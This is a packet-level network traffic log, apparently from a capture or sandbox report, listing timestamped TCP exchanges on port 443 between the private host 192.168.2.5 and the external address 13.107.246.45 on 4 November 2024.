Nov 4, 2024 17:31:45.753699064 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.753742933 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.753835917 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.754010916 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.754021883 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.829478979 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.834682941 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.834748030 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.834814072 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.886214972 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.886230946 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.886269093 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.886275053 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.887921095 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.943075895 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.987524033 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.002402067 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.002408981 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.006659985 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.006664991 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.010504007 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.019238949 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.019256115 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.019691944 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.019696951 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.027623892 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.090300083 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.090318918 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.090897083 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.090910912 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.134023905 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.134416103 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.134490967 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.142986059 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.143017054 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.143055916 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.143095970 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.143132925 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.161753893 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.161791086 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.161878109 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.162009001 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.162009001 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.162035942 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.162048101 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.163386106 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.163397074 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.163441896 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.163446903 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.164968014 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.164985895 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.166248083 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.166301012 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.166418076 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.169230938 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.169269085 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.169435024 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.169436932 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.169445992 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.170053005 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.170068026 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.216728926 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.216813087 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.216869116 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.217164040 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.217191935 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.217206955 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.217214108 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.220503092 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.220530987 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.220608950 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.220751047 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.220761061 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.493514061 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.494138956 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.494148970 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.494762897 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.494769096 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.633528948 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.633590937 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.633738995 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.633889914 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.633904934 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.633986950 CET	49829	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.634001970 CET	443	49829	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.636852026 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.636893988 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.637013912 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.637271881 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.637283087 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.893367052 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.893991947 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.894026995 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.894717932 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.894726992 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.908370972 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.908854008 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.908869982 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.909372091 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.909378052 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.910677910 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.911130905 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.911159992 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.911907911 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.911915064 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.970879078 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.971386909 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.971416950 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:46.971950054 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:46.971956015 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.023130894 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.023169041 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.023226976 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.023236036 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.023298025 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.023595095 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.023622036 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.023636103 CET	49830	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.023644924 CET	443	49830	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.026885986 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.026921034 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.026988983 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.027221918 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.027232885 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.041348934 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.041455030 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.041512012 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.041593075 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.041616917 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.041635990 CET	49831	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.041642904 CET	443	49831	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.043411016 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.043477058 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.043539047 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.043629885 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.043644905 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.043654919 CET	49832	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.043661118 CET	443	49832	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.045619011 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.045653105 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.045759916 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.045905113 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.045917988 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.046256065 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.046305895 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.046375036 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.046536922 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.046555996 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.103156090 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.103223085 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.103297949 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.103466988 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.103487015 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.103498936 CET	49833	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.103506088 CET	443	49833	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.106686115 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.106708050 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.106820107 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.106985092 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.106997013 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.373157024 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.373862028 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.373878956 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.374360085 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.374365091 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.503453016 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.503525972 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.503571987 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.503598928 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.503690958 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.507899046 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.507899046 CET	49834	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.507915020 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.507925987 CET	443	49834	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.512058020 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.512115955 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.512218952 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.512409925 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.512438059 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.766910076 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.767569065 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.767600060 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.768049955 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.768057108 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.770308018 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.770596027 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.770621061 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.770926952 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.770932913 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.867033005 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.867588043 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.867600918 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.868092060 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.868098021 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.905404091 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.905523062 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.905757904 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.905800104 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.905800104 CET	49835	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.905817986 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.905822992 CET	443	49835	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.908699989 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.908726931 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.908811092 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.908992052 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.909002066 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.916682959 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.916749001 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.916847944 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.917062044 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.917077065 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.917130947 CET	49837	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.917136908 CET	443	49837	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.920135975 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.920182943 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.920444012 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.920444012 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.920474052 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.945102930 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.945585966 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.945599079 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:47.946043968 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:47.946048975 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.003420115 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.003451109 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.003489017 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.003561974 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.003732920 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.003752947 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.003767014 CET	49838	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.003773928 CET	443	49838	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.006577015 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.006607056 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.006854057 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.007342100 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.007354021 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.237529039 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.237607956 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.237680912 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.237955093 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.237972975 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.237984896 CET	49836	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.237991095 CET	443	49836	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.241056919 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.241096020 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.241187096 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.241389990 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.241400003 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.258523941 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.262506008 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.262515068 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.262955904 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.262959957 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.394454956 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.394514084 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.396245956 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.396558046 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.396574020 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.396591902 CET	49839	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.396598101 CET	443	49839	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.399890900 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.399915934 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.402124882 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.402271986 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.402280092 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.666249037 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.666678905 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.666702986 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.667155981 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.667161942 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.680594921 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.680995941 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.681020975 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.681437969 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.681443930 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.753011942 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.753627062 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.753643990 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.754120111 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.754126072 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.804384947 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.804466963 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.804533005 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.804755926 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.804773092 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.804785013 CET	49840	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.804792881 CET	443	49840	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.807588100 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.807646036 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.807737112 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.807879925 CET	49845	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.807899952 CET	443	49845	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.827483892 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.827558994 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.827682972 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.827826023 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.827845097 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.827857018 CET	49841	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.827862978 CET	443	49841	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.830368042 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.830411911 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.830496073 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.830631971 CET	49846	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.830643892 CET	443	49846	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.917960882 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.917993069 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.918040991 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.918140888 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.918318033 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.918333054 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.918354988 CET	49842	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.918359995 CET	443	49842	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.921062946 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.921091080 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:48.921215057 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.921392918 CET	49847	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:48.921401024 CET	443	49847	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.037278891 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.037789106 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.037805080 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.038317919 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.038324118 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.168366909 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.168443918 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.168509960 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.168692112 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.168706894 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.168716908 CET	49843	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.168724060 CET	443	49843	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.171654940 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.171691895 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.171844006 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.171968937 CET	49848	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.171993971 CET	443	49848	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.243200064 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.243628979 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.243639946 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.244091988 CET	49844	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:49.244096041 CET	443	49844	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:49.384042025 CET	443	49844	13.107.246.45	192.168.2.5
